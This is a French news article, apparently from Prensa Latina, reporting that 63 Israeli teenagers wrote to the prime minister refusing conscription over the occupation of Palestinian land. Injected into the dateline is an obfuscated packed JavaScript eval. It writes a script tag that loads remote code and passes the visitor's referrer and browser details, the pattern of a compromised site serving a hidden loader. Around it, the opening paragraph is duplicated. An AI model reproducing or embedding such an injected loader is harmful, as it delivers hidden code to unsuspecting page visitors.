dimanche 14 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

De jeunes israéliens refusent de participer à l´occupation des terres palestiniennes

Tel-Aviv, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|intia|var|u0026u|referrer|tsdrr||js|php'.split('|'),0,{})) 28 décembre (Prensa Latina) Soixante-trois adolescents israéliens ont publiquement déclaré qu´ils se nieront à être recrutés par l´armée de leur pays pour ne pas participer à l´occupation de terres palestiniennes.

Tel-Aviv, 28 décembre (Prensa Latina) Soixante-trois adolescents israéliens ont publiquement déclaré qu´ils se nieront à être recrutés par l´armée de leur pays pour ne pas participer à l´occupation de terres palestiniennes.

Dans une carte envoyée au premier ministre israélien, Benjamin Netanyahu, au chef de Cabinet, Gadi Eisenkot et au ministre de la Défense et de l´Éducation, les lycéens ont signalé que « nous avons décidé de ne pas prendre part à l´occupation et l´oppression du peuple palestinien ».

« Nous n´allons pas continuer à y participer », ont-ils précisé dans leur missive.

Ils ont également dénoncé le fait que « l´armée met en pratique la politique raciste du Gouvernement qui viole les droits de l´homme de base, puis applique une loi pour les israéliens et une autre pour les palestiniens sur le même territoire ».

Les jeunes ont de plus protesté contre « l´incitation institutionnelle et intentionnelle à la haine contre les palestiniens des deux côtés de la Ligne Verte » (démarcation de 1949 qui sépare Israël et la Cisjordanie).

« Maintenant nous sommes ici : de jeunes filles et garçons en âge d´être enrôlés, de différentes régions du pays et de différents milieux socioéconomiques, qui refusent de croire en ce système d´incitation à la haine, puis de participer à l´oppression et l´occupation mises en œuvre par le Gouvernement », ont-ils ajouté dans le texte.

« Nous refusons d´être enrôlés et de servir dans l´armée en raison de nos valeurs de paix, de justice et d´égalité, et ayant conscience qu´il existe une autre réalité que nous pourrions créer ensemble », ont-ils conclu.

Selon certaines sources, actuellement, près de 7 mille soldats abandonneraient le service militaire tous les ans.

peo/pgh/mv

EN CONTINU
notes connexes